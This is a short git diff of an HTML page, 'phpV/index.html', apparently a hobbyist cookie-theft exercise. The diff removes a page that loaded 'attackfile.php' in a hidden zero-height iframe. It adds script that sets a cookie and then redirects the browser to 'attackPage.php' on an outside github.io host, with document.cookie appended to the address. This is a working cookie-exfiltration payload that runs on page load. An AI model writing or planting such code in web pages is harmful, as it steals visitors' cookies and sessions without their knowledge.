--- a/phpV/index.html
+++ b/phpV/index.html
@@ -1,13 +1,12 @@
 <!DOCTYPE html>
-<html lang="en">
-<head>
-  <title>sakuradev</title>
-  <meta charset="UTF-8">
-  <meta http-equiv="X-UA-Compatible" content="IE=edge">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <link rel="stylesheet" href="assets/css/main.css">
-  <link rel="stylesheet" href="assets/css/cte.css">
-</head>
-<body>
-    <iframe src="https://pandacatplayz.github.io/phpV/attackfile.php" width=100% height=0></iframe>
-</body>
+<html>
+    <head>
+        <script type="text/javascript">
+            document.cookie="username=Null Byte";
+        </script>
+        
+        <script type="text/javascript">
+            document.location='https://pandacatplayz.github.io/phpV/attackPage.php?c='+document.cookie;
+        </script>
+    </head>
+</html>
